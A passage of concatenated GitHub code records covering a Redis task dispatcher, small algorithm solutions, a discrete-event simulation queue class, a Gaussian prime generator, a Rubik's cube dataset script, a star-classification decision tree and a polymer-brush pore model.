redis_util\n\n'''\n任务分发从redis\n\n逻辑:在redis中新建一个hash表,数据格式如, 100000,no\n\n# 然后从中一直取数据,取出则把任务标识(初始(0),取出(1),成功(2),失败(3))\n然后从中一直取数据,取出则把任务标识(初始(0),成功(2),失败(3))\n\n'''\n\n\n# 取出任务\ndef get_task(redic_client, hash_key, value_key):\n redis_resp = redic_client.hget(hash_key, value_key)\n if redis_resp:\n # 取出任务,并把任务状态置为 'yes'\n redic_client.hset(hash_key, value_key, 1)\n return redis_resp\n\n\n# 标记任务 任务标识(初始(0),取出(1),成功(2),失败(3))\ndef sign_task(redic_client, hash_key, value_key, status):\n redic_client.hset(hash_key, value_key, status)\n\n\n# 得到任务总数,返回是int类型\ndef get_all_task_size(redis_client, hash_key):\n return redis_client.hlen(hash_key)\n\n\n# 分发任务界线数量\n# def dispatch_task_size(all_task_size, thread_num):\n# sign_task_num = all_task_size / thread_num\n# task_list = []\n# count = 0\n# for index in range(thread_num):\n# count += 1\n# t = (count, int(sign_task_num * count))\n# task_list.append(t)\n# return task_list\n\n\n#\ndef get_all_task_iter(redis_client, hash_key):\n result_iter = redis_client.hscan_iter(hash_key)\n return result_iter\n\n\n# 将任务装入队列\ndef get_task_queue(queue, task_iter):\n for task in task_iter:\n status = task[1]\n status = fetch_util.byte_to_str(status)\n # print(\"status:\", status)\n if status == '0':\n queue.put(task)\n\n# 结果自增\ndef count_result(redis_client, key):\n return redis_client.incr(key)\n\n\nif __name__ == '__main__':\n # redisPool = RedisPool()\n # conn = redisPool.connection()\n # redis_client = redis.Redis(connection_pool=redisPool.connection())\n\n redis_pool = redis_util.get_redis_pool_connection()\n redis_client = redis.Redis(connection_pool=redis_pool)\n\n # resp = redis_client.hget('jd_20161024', '1000004')\n # resp = resp.decode()\n # print(resp)\n #\n # redis_client.hset('jd_20161024', '1000004', 'yes')\n #\n # print(type(resp))\n\n # resp = get_task(redis_client, 'jd_20161024', '1000007')\n # print(resp)\n\n # sign_task(redis_client, 'jd_20161024', '1000007', 7)\n\n # resp2 = get_all_task_size(redis_client, 'jd_20161024')\n # print(type(resp2))\n # print(resp2)\n\n # tasks = dispatch_task_size(100, 6)\n #\n # for task in tasks:\n # print(task)\n # print(type(task))\n\n\n # res = redis_client.hscan_iter(\"jd_20161024\", count=10)\n #\n # print(len(res))\n\n # first = True\n # for re in res:\n # print(re)\n # if first:\n # print(type(re))\n # print(\"----\\n\")\n # first = False\n # break\n\n\n # res = redis_client.hscan(\"jd_20161024\", 0, None)\n\n # for r in res:\n # print(r)\n\n\n\n\n\n\n # cursor, data = redis_client.hscan(\"jd_20161024\", 0, None)\n\n # print(cursor)\n # print(len(data))\n #\n # cursor, data = redis_client.hscan(\"jd_20161024\", cursor, None)\n #\n # print(cursor)\n # print(len(data))\n # cursor, data = redis_client.hscan(\"jd_20161024\", cursor, None)\n #\n # print(cursor)\n # print(len(data))\n # cursor, data = redis_client.hscan(\"jd_20161024\", cursor, None)\n #\n # print(cursor)\n # print(len(data))\n\n # print(len(t))\n\n\n # for r in t:\n # print(r)\n\n\n\n res = redis_client.hscan_iter(\"jd_20161024\", None, 10)\n\n # print(res.__next__())\n\n for r in res:\n print(r)\n\n pass\n","repo_name":"lancong/Spiders","sub_path":"task_dispatch.py","file_name":"task_dispatch.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"9364404235","text":"def toSeconds(h, m, s):\n return h * 60 * 60 + m * 60 + s\n\nn = int(input())\n\nintervals = [[] for i in range(n)]\n\nfor i in range(n):\n h1, m1, s1, h2, m2, s2 = map(int, input().split())\n intervals[i] = [toSeconds(h1, m1, s1), toSeconds(h2, m2, s2)]\n\nintervals.sort(key=lambda x: x[0])\n\nresult = toSeconds(20, 0, 0) - toSeconds(8, 0, 0)\nstart = intervals[0][0]\nend = intervals[0][1]\n\nfor interval in intervals:\n if interval[0] <= end: \n end = max(end, interval[1])\n else:\n result -= end - start\n start = interval[0]\n end = interval[1]\n \n\nresult -= end - start\nprint(result)\n\n\n \n \n","repo_name":"AndrewOleksiuk/Algorithms","sub_path":"algotester0173.py","file_name":"algotester0173.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"75330061159","text":"from collections import deque, namedtuple, OrderedDict\n\nimport numpy as np\n\nfrom despy.model.component import Component\nfrom despy.output.report import Datatype\nimport despy.output.plot as plot\nfrom despy.output.statistic import DiscreteStatistic\nfrom despy.output.statistic import TimeWeightedStatistic\n\nclass Queue(Component):\n \"\"\"A component that represents a real world queue.\n \n A Queue object represents a real-world queue, such as a line of\n customers waiting for a server, or a line of products waiting for a\n machine.\n \n **Inherited Classes**\n * :class:`despy.base.named_object2.NamedObject`\n * :class:`despy.model.component.Component`\n \n **Members**\n \n .. autosummary::\n \n Item\n length\n times_in_queue\n add\n remove\n get_data\n \n \"\"\"\n\n def __init__(self, name, max_length = None,\n description = None):\n \"\"\"Create a Queue object.\n \n *Arguments*\n ``model`` (:class:`despy.model.model.Model`)\n The Queue must be assigned to a Model object.\n ``name`` (String)\n A short descriptive name for the Queue object.\n ``max_length`` (Integer)\n If ``None`` (default value), then the Queue length can\n grow indefinitely. If set to an integer, the Queue will\n be limited to ``max_length``.\n ``description`` (String)\n Optional. Default is None. \n \"\"\"\n \n super().__init__(name, description = description)\n if isinstance(max_length, int):\n self._queue = deque(max_length)\n else:\n self._queue = deque()\n self._times_in_queue = []\n self.results.stats['Queue_time'] = DiscreteStatistic('w_q', 'u4')\n self.results.stats['Queue_length'] = TimeWeightedStatistic('L_q', 'u4')\n \n Item = namedtuple('Item', ['item_fld', 'time_in_fld'])\n \"\"\"(Class) A named tuple that contains an item added to the queue.\n \n *Attributes*\n ``item_fld``\n An object that is added to the queue.\n ``time_in_fld``\n The time the object was added to the queue.\n \"\"\"\n\n @property\n def length(self):\n \"\"\"The number of entities in the queue at the current time.\n \n *Type:* Integer, read-only.\n \"\"\"\n return len(self._queue)\n\n @property\n def times_in_queue(self):\n \"\"\"List of times (integers) that entities spent in the queue.\n \n *Type:* List of integers, read-only.\n \n The first element of the list is the time that the first entity\n to leave the queue spent in the queue, the second element is for\n the second entity to leave the queue, etc.\n \"\"\"\n return self._times_in_queue\n \n def setup(self):\n self.results.stats['Queue_length'].append(self.sim.now,\n self.length)\n# \n# def finalize(self):\n# self.statistics['Queue_length'].append(self.sim.now,\n# self.length)\n\n def teardown(self):\n self.clear()\n\n def add(self, item):\n \"\"\"Add an item to the end of the queue.\n \n *Arguments*\n ``item``\n The item that will be added to the queue.\n \"\"\"\n self._queue.append(Queue.Item(item_fld = item, \\\n time_in_fld = self.sim.now))\n message = \"Entering Queue\"\n fields = OrderedDict()\n fields[\"Length\"] = self.length\n fields[\"Entity\"] = str(item)\n self.sim.results.trace.add_message(message, fields)\n \n def remove(self):\n \"\"\"Remove an item from the beginning of the queue.\n \n *Arguments*\n ``item``\n The item that will be removed from the queue.\n \n *Returns:* The item that was removed from the queue.\n \"\"\"\n item = self._queue.popleft()\n q_time = self.sim.now - item.time_in_fld\n self.times_in_queue.append(q_time)\n self.results.stats['Queue_time'].append(self.sim.now, q_time)\n \n message = \"Leaving Queue\"\n fields = OrderedDict()\n fields[\"Length\"] = self.length\n fields[\"Entity\"] = str(item.item_fld)\n fields[\"Time_in_Q\"] = q_time\n self.sim.results.trace.add_message(message, fields) \n \n return item.item_fld\n \n def clear(self):\n self._queue.clear()\n \n def get_data(self, full_path):\n \"\"\"Creates charts and adds data to final report.\n \n *Arguments*\n ``folder`` (String)\n All charts will be saved to the location denoted by\n 'folder'.\n \n *Returns:* A despy.model.output.Datatype formatted list\n containing data for the final report.\n \"\"\"\n # Create Time in Queue Histogram\n qtimes = np.array(self.times_in_queue, np.int32)\n qtime_filename = '{0}_time_in_q'.format(self.id)\n full_fname = plot.Histogram(self.times_in_queue, full_path,\n qtime_filename,\n title = self.name,\n x_label = \"Time in Queue\",\n y_label = \"Frequency\") \n \n # Create output\n output = [(Datatype.title, \"Queue Results: {0}\".format(self.name)),\n (Datatype.paragraph, self.description.__str__()),\n (Datatype.param_list,\n [('Maximum Time in Queue', np.amax(qtimes)),\n ('Minimum Time in Queue', np.amin(qtimes)),\n ('Mean Time in Queue', np.mean(qtimes))]),\n (Datatype.image, full_fname)]\n \n return output","repo_name":"irwinsnet-old/DesPy","sub_path":"despy/model/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13139273069","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport prime\nimport generator\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\nclass Generator(generator.Generator):\n \"\"\"Generator child class for generating Gaussian Primes.\n\n Note that minimum and maximum inputs to this class have type of complex,\n rather than the usual int.\n\n Attributes:\n limit (int): The limit required to generate the list of primes. This\n needs to be calculated to fully cover the range of the \n gaussian primes.\n primes (list): Set of primes required to construct the list of gaussian\n primes.\n \n Keyword Arguments:\n minimum -- the lower limit of the dataset (default complex(0, 0))\n maximum -- the upper limit of the dataset (default complex(1, 1))\n \"\"\"\n def __init__(self, minimum=complex(0, 0), maximum=complex(1, 1)):\n super(self.__class__, self).__init__(minimum, maximum)\n self.path = \"primes/generator/data/gaussians/\"\n self.datatype = complex\n # the threshold for this dataset should be slightly more lenient \n # than usual\n self.threshold = 300\n self.limit = max([np.real(self.minimum)**2 + np.imag(self.minimum)**2,\n np.real(self.maximum)**2 + np.imag(self.maximum)**2])\n sieve = prime.Generator(maximum=int(self.limit))\n sieve.generate()\n self.primes = sieve.data\n\n def generate(self):\n \"\"\"Generates the set of Gaussian Primes within the constraints of the \n minimum and maximum passed to this class, subject to values outputted by\n the `is_gaussian_prime' function.\n \n See the generate function stub in the Generator parent class for more\n information.\n \"\"\"\n logger.info(\"Checking cache\")\n self.data = self.read_cache()\n cache_miss = self.not_in_cache()\n if cache_miss:\n self.data = list(self.data)\n for n in cache_miss[0]:\n if self.is_gaussian_prime(n):\n self.data.insert(0, n)\n for n in cache_miss[1]:\n if self.is_gaussian_prime(n):\n self.data.append(n)\n self.data = np.array(self.data)\n else:\n gaussians = []\n logger.info(\"Starting generation\")\n for i in range(np.real(self.minimum), np.real(self.maximum)):\n for j in range(np.imag(self.minimum), np.imag(self.maximum)):\n z = np.complex(i, j)\n if self.is_gaussian_prime(z):\n gaussians.append(z)\n logger.info(\"%s\", str(i))\n logger.info(\"Writing data\")\n self.data = np.array(gaussians)\n self.to_file()\n\n def is_gaussian_prime(self, z):\n \"\"\"Function to determine whether the imputed complex number is a\n Gaussian Prime, subject to the following constraints.\n\n Let z be expressed as a complex number in the form: z = a + bi; where a\n is the real component and b is the imaginary component. A Gaussian Prime\n therefore is complex number where ONE of the following is true:\n 1) If both a and b are nonzero then, a + bi is a Gaussian Prime iff\n a**2 + b**2 is an ordinary prime.\n 2) If a = 0, then bi is a Gaussian Prime iff abs(b) is an ordinary\n prime and abs(b) % 4 = 3.\n 3) If b = 0, then a is a Gaussian Prime iff abs(a) is an ordinary\n prime and abs(a) % 4 = 3.\n\n Arguments:\n z -- a complex number\n \"\"\"\n if not isinstance(z, complex):\n return False\n re = np.real(z)\n im = np.imag(z)\n result = False\n if re != 0 and im != 0 and re ** 2 + im ** 2 in self.primes:\n result = True\n elif re == 0 and abs(im) in self.primes and abs(im) % 4 == 3:\n result = True\n elif im == 0 and abs(re) in self.primes and abs(re) % 4 == 3:\n result = True\n return result\n","repo_name":"rinfz/Primes","sub_path":"primes/generator/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24842303768","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the migratoryBirds function below.\ndef migratoryBirds(arr):\n birdIdHash = {}\n maxSightings = 0\n maxSightingsId = 0\n for id in arr:\n if id in birdIdHash:\n birdIdHash[id] += 1\n else:\n birdIdHash[id] = 1\n if birdIdHash[id] > maxSightings:\n maxSightings = birdIdHash[id]\n maxSightingsId = id\n if birdIdHash[id] == maxSightings and id < maxSightingsId:\n maxSightingsId = id\n return maxSightingsId\n\nif __name__ == '__main__':\n try:\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n except KeyError:\n fptr = sys.stdout\n\n arr_count = int(input().strip())\n\n arr = list(map(int, input().rstrip().split()))\n\n result = migratoryBirds(arr)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"eggzotic/Hackerrank","sub_path":"MigratoryBirds/MigratoryBirds.py","file_name":"MigratoryBirds.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41847523343","text":"\"\"\"\n ----------------------------------------------------------------------------\n \"THE BEER-WARE LICENSE\" (Revision 42):\n wrote this file. As long as you retain\n this notice you can do whatever you want with this stuff. If we meet\n some day, and you think this stuff is worth it, you can buy me a beer in\n return Anton Bobrov\n ----------------------------------------------------------------------------\n\"\"\"\n\nimport argparse\nimport pycuber as pc\nfrom pycuber.solver import CFOPSolver\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"size\", help=\"number of sets\", type=int)\nparser.add_argument(\"file\", help=\"where to write\")\nargs = parser.parse_args()\n\nfaces = [\"L\", \"R\", \"U\", \"D\", \"B\", \"F\"]\ncolors = {\"[r]\": \"r\",\n \"[y]\": \"y\",\n \"[g]\": \"g\",\n \"[w]\": \"w\",\n \"[o]\": \"o\",\n \"[b]\": \"b\",\n \"[u]\": \"u\"}\n\ndef cubeAsArray(acube):\n cubeArray = []\n for face in faces:\n face = acube.get_face(face)\n for x in [0,1,2]:\n for y in [0,1,2]:\n cubeArray.append(colors[str(face[x][y])])\n return cubeArray\n\ndef solutionAsArray(asolution):\n solutionArray = []\n for step in asolution:\n solutionArray.append(str(step))\n return solutionArray\n\nsetfile = open(args.file, 'w')\n\nfor i in range(args.size):\n cube = pc.Cube()\n alg = pc.Formula()\n random_alg = alg.random()\n cube(random_alg)\n cube_array = cubeAsArray(cube)\n solver = CFOPSolver(cube)\n solution = solver.solve(suppress_progress_messages=True)\n solution_array = solutionAsArray(solution.optimise())\n setfile.write(' '.join(cube_array) + '\\n')\n setfile.write(' '.join(solution_array) + '\\n')\n\nsetfile.close()\n","repo_name":"antbob/qub3rt","sub_path":"gensets.py","file_name":"gensets.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"21369406003","text":"import requests\nfrom thunderbolt100k import constants\nimport json\nfrom thunderbolt100k.libs.compare_time import compare_time\nfrom thunderbolt100k.libs.common import pl9k_color\nimport datetime\n\nSESSION = requests.session()\n\n\ndef user_input():\n result = dict()\n result['WEATHER_TOKEN'] = raw_input(\"Please input your api key for https://api.apixu.com: \")\n result['WEATHER_CITY'] = raw_input('Please input the city of your location (e.g. Shanghai): ')\n return result\n\n\ndef fetch():\n assert 'WEATHER_TOKEN' in constants.CONFIG, 'You must set `THUNDERBOLT_WEATHER_TOKEN` in `~/.zshrc` file'\n assert 'WEATHER_CITY' in constants.CONFIG, 'You must set `THUNDERBOLT_WEATHER_CITY` in `~/.zshrc` file'\n response = SESSION.get(\n 'https://api.apixu.com/v1/forecast.json?key={token}&q={city}&days=2'.format(\n token=constants.CONFIG.get('WEATHER_TOKEN'),\n city=constants.CONFIG.get('WEATHER_CITY')))\n\n return response.content if response.status_code == 200 else None\n\n\ndef display():\n path = constants.DATA_PATH_FORMAT.format('weather')\n with file(path, 'r') as f:\n content = json.load(f)\n now = datetime.datetime.now()\n # Use the next day's forecast info if the time is later than 23:00\n if now.hour >= 23:\n info = content['forecast']['forecastday'][1]['hour'][now.hour - 23]\n else:\n info = content['forecast']['forecastday'][0]['hour'][now.hour + 1]\n\n temp = info['temp_c']\n condition = info['condition']['text']\n update_time = content['current']['last_updated']\n delta_minute, delta_hour, delta_day = compare_time(update_time, '%Y-%m-%d %H:%M')\n\n if 'thunder' in condition or 'Thunder' in condition:\n symbol = \"\\uf0e7\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_THUNDER_COLOR'))\n elif 'rain' in condition or 'drizzle' in condition:\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_RAIN_COLOR'))\n symbol = \"\\ue239\"\n elif 'Cloudy' in condition:\n symbol = \"\\uf0c2\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_CLOUD_COLOR'))\n elif 'Overcast' in condition:\n symbol = \"\\uf0c2\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_OVERCAST_COLOR'))\n elif \"Partly cloudy\" in condition:\n symbol = \"\\ue21d\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_CLOUD_COLOR'))\n elif condition == 'Sunny' or condition == 'Clear':\n symbol = \"\\uf185\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_SUN_COLOR'))\n elif 'snow' in condition:\n symbol = \"\\uf2dc\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_SNOW_COLOR'))\n else:\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_DEFAULT_COLOR'))\n symbol = \"\\uf422\"\n\n if temp >= 35:\n temp_color = pl9k_color(constants.CONFIG.get('WEATHER_HIGH_TEMP_COLOR'))\n temp_symbol = '\\uf2c7'\n elif temp >= 28:\n temp_color = pl9k_color(constants.CONFIG.get('WEATHER_MIDDLE_TEMP_COLOR'))\n temp_symbol = '\\uf2c8'\n elif temp < 10:\n temp_color = pl9k_color(constants.CONFIG.get('WEATHER_LOW_TEMP_COLOR'))\n temp_symbol = '\\uf2cb'\n else:\n temp_color = pl9k_color(constants.CONFIG.get('WEATHER_DEFAULT_COLOR'))\n temp_symbol = '\\uf2c9'\n\n delay_minutes = delta_minute + 60 * delta_hour + 60 * 24 * delta_day\n\n if delta_day == 0:\n if delta_hour == 0:\n time_string = '>{0} min'.format(delta_minute)\n else:\n time_string = '>{0} hour'.format(delta_hour)\n else:\n time_string = '>{0} day'.format(delta_day)\n\n result = \"%{\" + symbol_color + \"%}\" + symbol + \" %{\" + temp_color + \"%}\" + str(\n temp) + temp_symbol\n\n if delay_minutes >= int(constants.CONFIG.get('WEATHER_SHOW_UPDATE_TIME')):\n result += \"%{\" + pl9k_color(constants.CONFIG.get('WEATHER_UPDATE_TIME_COLOR')) + \"%}\" + \"({0})\".format(\n time_string)\n\n return result\n","repo_name":"cuyu/thunderbolt100k","sub_path":"thunderbolt100k/widgets/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"71285619879","text":"import string\n\n\ndef count_words(text, words):\n t = 0\n text = text.lower()\n for i in string.punctuation:\n text = text.replace(i, '')\n text = set(text.split(' '))\n for j in words:\n for k in text:\n if j in k:\n t += 1\n return t\n\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert count_words(\"How aresjfhdskfhskd you?\", {\"how\", \"are\", \"you\", \"hello\"}) == 3, \"Example\"\n assert count_words(\"Bananas, give me bananas!!!\", {\"banana\", \"bananas\"}) == 2, \"BANANAS!\"\n assert count_words(\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit.\",\n {\"sum\", \"hamlet\", \"infinity\", \"anything\"}) == 1, \"Weird text\"\n print(\"Coding complete? Click 'Check' to review your tests and earn cool rewards!\")\n","repo_name":"lodgeinwh/Study","sub_path":"Python/Py.Checkio/Home/Monkey Typing.py","file_name":"Monkey Typing.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40431496514","text":"import sys\n\ndef add(a, b):\n equal = a + b\n return equal\n\ndef subtract(a, b):\n equal = a - b\n return equal\n\ndef multiply(a, b):\n equal = a * b\n return equal\n\ndef divide(a, b):\n equal = a / b\n return equal\n\ndef choice(a, b, choose):\n if choose == \"add\":\n return add(a, b)\n elif choose == \"subtract\":\n return subtract(a, b)\n elif choose == \"multiply\":\n return multiply(a, b)\n elif choose == \"divide\":\n return divide(a, b) \n\ndef get_input():\n a = sys.argv[1]\n b = sys.argv[2]\n choose = sys.argv[3]\n return int(a), int(b), str(choose)\n\ndef main():\n try:\n a, b, choose = get_input()\n equal = choice(a, b, choose)\n print(equal)\n except Exception as e:\n print(\"error\")\n\nmain()","repo_name":"mursyidmahadi/web-development","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27411094969","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import OrdinalEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.feature_selection import chi2\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.tree import plot_tree\r\n\r\ndf = pd.read_csv('star_classification.csv')\r\n\r\n\r\nplots=[]\r\nfor i in ['rerun_ID']:\r\n g=sns.relplot(data=df,x='obj_ID', y=i, hue='class')\r\n plt.show()\r\n\r\nenc = OrdinalEncoder()\r\ndf['class'] = enc.fit_transform(df[['class']])\r\ndf['class'].head(10)\r\n\r\n\r\nX = df.drop(columns=['class'])\r\ny = df.loc[:, ['class']]\r\nminmax = MinMaxScaler()\r\nscaled = minmax.fit_transform(X)\r\n\r\n\r\nbest_feature = SelectKBest(score_func=chi2)\r\nfit = best_feature.fit(scaled, y)\r\n\r\n\r\nfeature_score = pd.DataFrame({\r\n 'feature' : X.columns,\r\n 'score': fit.scores_\r\n})\r\n\r\n\r\nfeature_score.sort_values(by=['score'], ascending=False, inplace=True)\r\n\r\n\r\n\r\n\r\nstd = StandardScaler()\r\nscaled = std.fit_transform(X)\r\nscaled = pd.DataFrame(scaled, columns=X.columns)\r\n\r\n\r\n\r\ndata_standardization = y.join(scaled)\r\n\r\n\r\nX = data_standardization.loc[:, ['redshift','u', 'g', 'r', 'i', 'z']]\r\ny = data_standardization.loc[:, 'class']\r\n\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\ndt = DecisionTreeClassifier(random_state=42)\r\ndt.fit(x_train, y_train)\r\n\r\nprint(dt.score(x_train,y_train),dt.score(x_test, y_test))\r\nprint(f'train: {round(dt.score(x_train,y_train) * 100, 2)}%')\r\nprint(f'test: {round(dt.score(x_test, y_test) * 100, 2)}%')\r\n\r\n\r\ndt = DecisionTreeClassifier(random_state=42, max_depth=5, min_samples_split=20, min_samples_leaf=5)\r\ndt.fit(x_train, y_train)\r\n\r\nprint(dt.score(x_train, y_train), dt.score(x_test, y_test))\r\nprint(f'train: {round(dt.score(x_train, y_train) * 100, 2)}%')\r\nprint(f'test: {round(dt.score(x_test, y_test) * 100, 2)}%')\r\n\r\nplt.figure(figsize=(10,7))\r\nplot_tree(dt, max_depth=2, filled=True, feature_names=['redshift','u', 'g', 'r', 'i', 'z'])\r\nplt.show()\r\n\r\nfrom sklearn.model_selection import cross_validate\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nrf = RandomForestClassifier(n_jobs=-1, random_state=42)\r\n\r\nscores = cross_validate(rf, x_train, y_train, cv=2, return_train_score=True, n_jobs=-1, verbose=2)\r\n\r\n\r\nprint(np.mean(scores['train_score']), np.mean(scores['test_score']))\r\nprint(f'train: {round(np.mean(scores[r\"train_score\"]) * 100, 2)}%')\r\nprint(f'test: {round(np.mean(scores[r\"test_score\"]) * 100, 2)}%')\r\n\r\n\r\ndt = DecisionTreeClassifier(max_depth=3, random_state=42)\r\ndt.fit(x_train,y_train)\r\n\r\nprint(dt.score(x_train,y_train),dt.score(x_test, y_test))\r\nprint(f'train: {round(dt.score(x_train,y_train) * 100, 2)}%')\r\nprint(f'test: {round(dt.score(x_test, y_test) * 100, 2)}%')\r\n\r\nplt.figure(figsize=(20,15))\r\nplot_tree(dt, filled=True, feature_names=['redshift','u', 'g', 'r', 'i', 'z'])\r\nplt.show()\r\n","repo_name":"multsidar/IAR_Belov_Shvartsman","sub_path":"trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7477242799","text":"\"\"\"\nThe script provides routines to calculate pore topology restricted \nand unrestrestricted polymer brushes. \n\nDocs for this module are not yet written, please take a look on \nplain.py script in the same directory, to get the idea of what is going on\n\n@author: Mikhail Laktionov\nmiklakt@gmail.com\n\"\"\"\n\nfrom functools import lru_cache\n\nfrom ascf_pb.solver import Phi\nfrom . import common\nfrom scipy.optimize import brentq\nfrom scipy import integrate\nimport numpy as np\n\nphi_D_unrestricted = common.phi_D_unrestricted\n\ndef theta(N : float, sigma : float, pore_Radius : float):\n return N*sigma*2*np.pi*pore_Radius\n\ndef normalization_unrestricted(\n chi : float, kappa : float, \n N : float, sigma : float, \n phi_D : float, pore_Radius : float):\n def integrand(z, d):\n return Phi(z = z, d=d,\n chi = chi, kappa=kappa, phi_D=phi_D)*abs(pore_Radius - z)\n def integral(d):\n return 2*np.pi*integrate.quad(integrand, 0, d, args=(d,))[0] - theta(N, sigma, pore_Radius)\n return integral\n\ndef D_boundary(pore_Radius : float, phi_const : float, N : float, sigma : float):\n D = pore_Radius - np.sqrt(pore_Radius**2 - theta(N, sigma, pore_Radius)/(np.pi*phi_const))\n return D\n\ndef D_unrestricted(\n chi : float, kappa : float,\n N : float, sigma : float, \n pore_Radius : float):\n phi_D = phi_D_unrestricted(chi)\n normalization = normalization_unrestricted(\n chi, kappa, N, sigma, phi_D, pore_Radius)\n min_D = D_boundary(pore_Radius, 1, N, sigma)\n #min_D = 0\n if phi_D == 0: max_D=min(pore_Radius,N)\n else: max_D=min(pore_Radius,D_boundary(pore_Radius, phi_D, N, sigma))#min(pore_Radius,N)#\n _D = common.normalization_find_root(normalization, min_D, max_D)\n return _D\n\n\n################################################################################\ndef normalization_restricted(\n chi : float, kappa : float, \n N : float, sigma : float, R : float, \n pore_Radius : float\n ):\n def integrand(z, phi_R):\n return Phi(z = z, d=R,\n chi = chi, kappa=kappa, phi_D=phi_R)*abs(pore_Radius - z)\n def integral(phi_R):\n return 2*np.pi*integrate.quad(integrand, 0, R, args = (phi_R,))[0] - theta(N, sigma, pore_Radius)\n return integral\n\n\ndef phi_D_restricted(\n chi : float, kappa : float, \n N : float, sigma : float, \n R : float, pore_Radius : float):\n phi_R_min = phi_D_unrestricted(chi)\n phi_R_max = 0.99 #can be evaluated with a separate routine\n norm = normalization_restricted(chi, kappa, N, sigma, R, pore_Radius)\n phi_R = brentq(norm, phi_R_min, phi_R_max)\n return phi_R\n\n\n################################################################################\n#@lru_cache()\ndef phi_D_universal(\n chi : float, kappa : float, \n N : float, sigma : float, \n R : float, pore_Radius : float):\n try:\n D = D_unrestricted(chi, kappa, N, sigma, pore_Radius)\n if R>=D:\n #brush is not restricted\n logging.debug(\"Unrestricted\")\n phi_D = phi_D_unrestricted(chi)\n else:\n #brush is restricted\n logging.debug(\"Restricted\")\n phi_D = phi_D_restricted(chi, kappa, N, sigma, R, pore_Radius)\n except:\n #brush is restricted\n logging.debug(\"Restricted\")\n phi_D = phi_D_restricted(chi, kappa, N, sigma, R, pore_Radius)\n return phi_D\n\n#@lru_cache()\ndef D_universal(\n chi : float, kappa : float, \n N : float, sigma : float, \n R : float, pore_Radius : float):\n try:\n D_ = D_unrestricted(chi, kappa, N, sigma, pore_Radius)\n if D_>R: D_=R\n except:\n D_ = R\n return D_\n\n\n################################################################################\ndef normalization_pore_opening(\n chi : float, kappa : float, \n N : float, sigma : float, phi_D : float\n ):\n def integrand(z, d):\n return Phi(z = z, d=d,\n chi = chi, kappa=kappa, phi_D=phi_D)*abs(d - z)\n def integral(d):\n return 2*np.pi*integrate.quad(integrand, 0, d, args=(d,))[0] - theta(N, sigma, d)\n return integral\n\n#@lru_cache()\ndef opening_pore_Radius(\n chi : float, kappa : float,\n N : float, sigma : float,\n ):\n phi_D = phi_D_unrestricted(chi)\n min_pore_R = 2*N*sigma\n if phi_D == 0: max_pore_R=N\n else: max_pore_R=2*N*sigma/phi_D\n normalization = normalization_pore_opening(chi, kappa, N, sigma, phi_D)\n pore_R = common.normalization_find_root(normalization, min_pore_R, max_pore_R)\n return pore_R\n\n\ndef normalization_chi_opening(\n kappa : float, \n N : float, sigma : float,\n R : float\n ):\n def integrand(z, chi):\n phi_D = phi_D_unrestricted(chi)\n return Phi(z = z, d=R,\n chi = chi, kappa=kappa, phi_D=phi_D)*abs(R - z)\n def integral(chi):\n return 2*np.pi*integrate.quad(integrand, 0, R, args=(chi,))[0] - theta(N, sigma, R)\n return integral\n\n#@lru_cache()\ndef chi_opening(\n kappa : float,\n N : float, sigma : float, R : float\n ):\n chi_min=0\n chi_max=1\n normalization = normalization_chi_opening(kappa, N, sigma, R)\n try:\n chi_open = brentq(normalization, chi_min, chi_max)\n except:\n chi_open = None\n return 